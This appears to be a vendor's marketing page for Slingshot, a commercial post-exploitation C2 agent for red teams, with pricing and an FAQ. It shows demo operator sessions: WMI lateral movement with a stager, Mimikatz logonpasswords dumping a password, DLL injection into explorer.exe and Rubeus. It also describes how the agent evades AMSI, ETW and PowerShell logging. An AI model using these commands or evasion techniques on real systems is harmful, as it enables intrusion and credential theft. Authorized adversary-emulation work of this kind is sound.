RED TEAM TOOLKIT

SLINGSHOT

Slingshot is a post-exploitation agent (stage 2) used by red teams
to conduct advanced network operations

Level Up Your Post Exploitation Skills!

Built with OpSec as a first priority, Slingshot empowers teams to more accurately emulate sophisticated adversaries. Capable of zero process creation, malleable network profiles, syscall process injection, memory obfuscation, and blended HTML traffic, Slingshot makes no compromises. It enables operations to run with a limited detection surface, powerful modularity, and epheremal concepts.

Looking to step up your game? Slingshot is the perfect fit.

python slingshot.py 
  ___ _ _              _        _   
 / __| (_)_ _  __ _ __| |_  ___| |_ 
 \__ \ | | ' \/ _` (_-< ' \/ _ \  _|
 |___/_|_|_||_\__, /__/_||_\___/\__|
              |___/        v2.00.0
                  
 Notes: New features and bug fixes.
[+] Using the 'primary' profile [+] Prepared 32 modules [+] Blended obfuscation is enabled! [+] HTTP/S server is running (0.0.0.0) [+] Switching NOqgdSTZaa to a derived key [+] Added new HTTPS target 'NOqgdSTZaa' from 8.8.8.8 at 22:06:07 on Jan 01 [+] Getting intitial target info getpid 
PID:  4238
Arch: x64
User: JOHN-PC\Admin
Image: C:\Windows\System32\explorer.exe
script download [+] Login succeeded [+] Downloaded scripts run modestmouse ADAM-LAPTOP wmi [+] Sometimes it pays to KISS ... [+] Architecture is x64 [+] Uploading stager to C:\Windows\TypeScr.lib [+] Using WMI for execution ... [+] Calling Win32_Process::Create [+] Pushing payload to the stager [+] Removing the stager at C:\Windows\TypeScr.lib [+] Finished. Use `link` if this was a SMB target. link ADAM-LAPTOP [+] Attempting to link up ... [+] Re-linked to R9j8segDnQ [!] Failed to connect to \\ADAM-LAPTOP\pipe\prtsvc [!] Failed to connect to \\ADAM-LAPTOP\pipe\msftpn interact R9j8segDnQ

Scripted Techniques

The agent is built in C++ with a Python 3 listening post/server. All C2 is compressed, encrypted, and validated with modern primitives. In addition to HTTP/S comms, SMB is supported for inter-network pivoting and host-to-host communication. Ever needed to be 8 hops deep for exfil? We have too.

Rather than basic lateral movement techniques obscured behind commands, we supply multiple pivoting techniques via a hosted repository of Slingshot scripts. Every capability in Slingshot is exposed with a dead simple Python library. This allows teams to automate any part of their operation with custom Slingshot scripts. Feeling tricky? Crack open the scripts for reference and modification.

Serious About Modularity

Modularity is a core design principle for Slingshot. In addition to modules we supply, such as Mimikatz and an in-memory keylogger, you can inject any native custom DLL into a local process or remote memory.

These in-memory modules remain stealthy when in use. For instance, while loaded, Mimikatz is constantly obfuscated in memory This helps avoid basic signatures which might compromise operations. Remember, opsec first!

mimikatz load [+] Completed successfully mimikatz coffee 
  ( (
   ) )
.______.
|      |]
\      /
 `----'
mimikatz sekurlsa::logonpasswords 
    Authentication Id : 0 ; 335132 (00000000:00051d1c)
    Session           : Interactive from 1
    User Name         : John
    Domain            : JOHN-PC
    Logon Server      : JOHN-PC
    Logon Time        : 1/01/1997 1:40:29 PM
    
        tspkg :	
         * Username : John
         * Domain   : JOHN-PC
         * Password : P@ssword0ne
         ...
inject -p explorer.exe exploit.dll [+] Completed succesfully
loadassembly rubeus.dll [+] Completed succesfully callassembly -m Rubeus.Program.Execute hash /password:Password123! 
     ______        _
    (_____ \      | |
     _____) )_   _| |__  _____ _   _  ___
    |  __  /| | | |  _ \| ___ | | | |/___)
    | |  \ \| |_| | |_) ) ____| |_| |___ |
    |_|   |_|____/|____/|_____)____/(___/
    
    v1.4.0
    
    
    [*] Action: Calculate Password Hashes
    
    [*] Input password   : Password123!
    [*]       rc4_hmac   : 2B576ACBE6BCFDA7294D6BD18041B8FE
powershell load [+] Completed succesfully powershell Get-Host 
    Name                           Value                  
    ----                           -----                  
    PSVersion                      5.1.18362.145          
    PSEdition                      Desktop                
    PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
    BuildVersion                   10.0.18362.145         
    CLRVersion                     4.0.30319.42000        
    WSManStackVersion              3.0                    
    PSRemotingProtocolVersion      2.3                    
    SerializationVersion           1.1.0.1

.NET Safe Haven

Slingshot has a sophisticated system for loading assemblies into the .NET Runtime (CLR). This system supports simultaneous modules and cross-version support with simple management. You can convert, author, and re-use advanced .NET code directly in Slingshot without creating external processes or constantly re-staging code.

Pre-built modules like in-memory PowerShell and SOCKS proxying make use of this integration to hyperextend Slingshot's functionality. Defensive protections such as ETW tracing, PowerShell logging, and AMSI are all handled transparently by Slingshot to reduce detection surface.

Extensible And Modular

Slingshot can load and execute PowerShell scripts and .NET assemblies in-memory extending functionality and automating routine tasks. Scripts and assemblies get loaded and executed to bypass AMSI and script block logging.

Covert Communication

Slingshot has malleable communication profiles, meaning operators can quickly and easily modify detailed aspects of the C2 traffic including HTTP headers, POST/GET pages and parameters, compression, connection wait times, and much more.

Python Scripting Engine

The Slingshot LP is built in Python 3. Operators can easily build and run custom Python scripts on targets to analyze command output, conduct host pivots, collect target data, or perform virtually any command in an automated fashion.

Windows API Integration

Many routine operator commands have been integrated directly into Slingshot through the use of Windows APIs. This allows operators to maintain operational security by avoiding appearing in the process list or the use of cmd.exe.

Command Logging

All commands and corresponding output are logged and timestamped. This allows red and blue teams to analyze target data, align timelines, and develop remediation plans.

Great Support

Slingshot is developed by the Silent Break Security team and used in cyberoperations continually. Development is constant as new features and improvements are pushed to the production version. Got ideas? We want to hear them!

Quick Facts

What does it cost?

RTT licenses cost $6,000 per user for the first year. Subsequent license renewals cost $3,000 per user per year.

I took the Dark Side Ops training and already have Slingshot. Is this version different?

Yes! The version of Slingshot in RTT is much more functional. Just see the features list above, or contact us for more details.

Does RTT include source code?

The Slingshot LP (e.g. server) source code is included in RTT. In addition, scripts provided by our team will be open source and available for study. The Slingshot agent (e.g. client) consists of several compiled binaries, patched with callback domain data.

We already have tool xyz! Why do we need another red team tool?

Maybe you don’t! There are some great red team tools out there and if you’re able to conduct adversary simulations without getting caught using your current tool chain, then great! We believe offense-in-depth is a necessary part of effective operations, and that the features and capabilities included in RTT are absolutely worth it.

Do you offer volume discounts?

Yes! Send us an email and we’ll help you out with custom pricing.

Can I get a demo? How about a trial?

Sure! Contact us to setup a demo or ask any additional questions. Also check out our YouTube Channel for videos showcasing the latest features and functionality. Currently, trial licenses are not provided.

Is there documentation? How about tutorials?

Documentation is maintained in the RTT Client Portal. It includes detailed tool usage and functionality, Slingshot Python scripting examples, and license information. Tutorials can be found on our YouTube Channel.

Learn more about the Toolkit



REQUEST DEMO Join Our Slack